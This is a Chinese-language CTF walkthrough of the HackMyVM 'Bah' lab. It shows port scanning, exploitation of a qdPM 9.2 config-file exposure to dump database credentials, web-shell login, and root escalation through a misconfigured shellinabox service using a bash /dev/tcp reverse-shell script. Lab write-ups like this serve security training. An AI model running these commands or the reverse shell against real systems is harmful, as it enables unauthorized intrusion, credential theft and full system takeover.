HACK-MY-VM esay Bah

Bah

端口探测

1
2
3
4
5
6
7
8
9
sudo nmap -sT --min-rate 1000 -p- 192.168.1.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 14:45 CST
Nmap scan report for portal.bah.hmv (192.168.1.130)
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 08:00:27:2A:70:45 (Oracle VirtualBox virtual NIC)

mysql匿名登录

1
2
3
kali@kali [~] ➜  mysql -h 192.168.1.130 -P 3306 -u root -p                                                                                                                   
Enter password: 
ERROR 1698 (28000): Access denied for user 'root'@'192.168.1.4'

匿名登录失败了

80端口测试

1

是一个登录框,但是应该是不存在sql注入的,因为它的登录功能好像没有完善,sqlmap也没有跑出来结果,但是我们注意到底下的qdPM 9.2,我们尝试一下寻找该系统是否爆出过漏洞

1
2
3
4
5
6
7
searchsploit qdPM 9.2                                                                                                                                        [14:49:32] 
------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------
 Exploit Title                                                                                                                                         |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------
qdPM 9.2 - Cross-site Request Forgery (CSRF)                                                                                                           | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated)                                                                                                         | php/webapps/50176.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------

CSRF客户端请求伪造,这是一个需要配合的漏洞,我们先看看所谓的密码的泄露,尝试去找一找

1
2
3
4
5
6
7
8
9
10
11
searchsploit -m php/webapps/50176.txt      //下载文件
cat 50176.txt                                                                                                                                                [14:57:32] 
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download

访问一个指定的路径,是有信息的泄露存在的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
http get http://192.168.1.130/core/config/databases.yml                                                                                                      [14:57:45] 
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 273
Content-Type: application/octet-stream
Date: Thu, 16 Jan 2025 06:59:44 GMT
ETag: "611d69c4-111"
Last-Modified: Wed, 18 Aug 2021 20:12:52 GMT
Server: nginx/1.18.0

  
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qpm;host=localhost'
      profiler: false
      username: qpmadmin
      password: "<?php echo urlencode('qpmpazzw') ; ?>"
      attributes:
        quote_identifier: true

是有好东西的,看来用户名是:qpmadmin,密码是:qpmpazzw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
mysql -h 192.168.1.130 -P 3306 -u qpmadmin -p                                                                                                                [14:59:50] 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 35
Server version: 10.5.11-MariaDB-1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| hidden             |
| information_schema |
| mysql              |
| performance_schema |
| qpm                |
+--------------------+
5 rows in set (0.009 sec)

Database changed
MariaDB [hidden]> show tables;
+------------------+
| Tables_in_hidden |
+------------------+
| url              |
| users            |
+------------------+
2 rows in set (0.001 sec)

MariaDB [hidden]> select * from url;
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
|  2 | http://imagine.bah.hmv  |
|  3 | http://ssh.bah.hmv      |
|  4 | http://dev.bah.hmv      |
|  5 | http://party.bah.hmv    |
|  6 | http://ass.bah.hmv      |
|  7 | http://here.bah.hmv     |
|  8 | http://hackme.bah.hmv   |
|  9 | http://telnet.bah.hmv   |
| 10 | http://console.bah.hmv  |
| 11 | http://tmux.bah.hmv     |
| 12 | http://dark.bah.hmv     |
| 13 | http://terminal.bah.hmv |
+----+-------------------------+
13 rows in set (0.004 sec)

MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
|  3 | luna    | Ihavealover         |
|  4 | ellie   | Ihaveapassword      |
|  5 | camila  | Ihaveacar           |
|  6 | mia     | IhaveNOTHING        |
|  7 | noa     | Ihaveflow           |
|  8 | nova    | Ihavevodka          |
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+
9 rows in set (0.001 sec)

MariaDB [hidden]>

很多用户名,但是那个登录界面肯定是登录不了了,一个是登录的页面就没做好,另外就是人家那个是邮箱,这里没有,行吧,直接上url,更改本地的hosts文件

2

第五个url解析到了一个登录的bash上面,那登录的账号密码估计就是了:

3

第二个用户名和密码直接成功登录,这个浏览器操作不方便,直接反弹shell

1
2
3
4
rocio@bah:~$ id
id
uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rocio@bah:~$

拿到了shell

提权

基本的定时任务,sudo -l ,历史命令,suid都看了,没发现啥有用的好东西,直接跑脚本,看一看进程里面有没有定时执行的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
2025/01/16 04:21:28 CMD: UID=1000  PID=27931  | ./pspy64 
2025/01/16 04:21:28 CMD: UID=0     PID=27922  | 
2025/01/16 04:21:28 CMD: UID=0     PID=27921  | 
2025/01/16 04:21:28 CMD: UID=0     PID=14482  | 
2025/01/16 04:21:28 CMD: UID=0     PID=14480  | 
2025/01/16 04:21:28 CMD: UID=0     PID=14432  | 
2025/01/16 04:21:28 CMD: UID=1000  PID=796    | bash -i 
2025/01/16 04:21:28 CMD: UID=1000  PID=795    | script 
2025/01/16 04:21:28 CMD: UID=1000  PID=787    | bash -i 
2025/01/16 04:21:28 CMD: UID=1000  PID=778    | -bash 
2025/01/16 04:21:28 CMD: UID=1000  PID=773    | (sd-pam) 
2025/01/16 04:21:28 CMD: UID=1000  PID=772    | /lib/systemd/systemd --user 
2025/01/16 04:21:28 CMD: UID=0     PID=766    | login -p -h 127.0.0.1 
2025/01/16 04:21:28 CMD: UID=0     PID=695    | 
2025/01/16 04:21:28 CMD: UID=106   PID=529    | /usr/sbin/mariadbd 
2025/01/16 04:21:28 CMD: UID=33    PID=467    | php-fpm: pool www
2025/01/16 04:21:28 CMD: UID=33    PID=466    | php-fpm: pool www
2025/01/16 04:21:28 CMD: UID=107   PID=441    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev 
2025/01/16 04:21:28 CMD: UID=33    PID=437    | nginx: worker process
2025/01/16 04:21:28 CMD: UID=107   PID=434    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

这里的一个任务非常的奇怪,我们去问问gpt解释一下

一条用于运行 shellinabox 的命令,shellinabox 是一个提供基于 Web 的 SSH 终端服务的工具。通过此命令,用户可以通过 Web 浏览器访问服务器的终端

对于 -s /devel:root:root:/:/tmp/dev

部分 含义
/devel 服务路径,表示用户通过 Web 访问 http://<host>:4200/devel 时,会连接到这个终端服务。
root 用户名,表示通过该路径登录的用户为 root
root 用户组,表示通过该路径登录的用户组为 root
/ chroot 目录,表示登录用户的文件系统视图被限制在系统根目录 /,即没有启用隔离环境。
/tmp/dev 登录后的工作目录,表示用户成功登录后,默认进入的目录是 /tmp/dev

这里的含义是切换目录,我们尝试写一个dev文件,反弹shell,看是否可以执行

1
2
3
#! /bin/bash

bash -i >& /dev/tcp/192.168.1.4/8888 0>&1

给的shell不好写,我们在kali里面写好,然后传过去,赋予执行权限,访问web地址

4

1
2
3
4
5
listening on [any] 8888 ...
Oconnect to [192.168.1.4] from (UNKNOWN) [192.168.1.130] 3336
root@bah:/# id
id
uid=0(root) gid=0(root) groups=0(root)

shell反弹成功,虽说是进入目录下,但是是执行了dev里面的命令,最后问gpt,给出的解释是:如果 /tmp/dev 是一个可执行文件,而不是目录,终端会试图执行该文件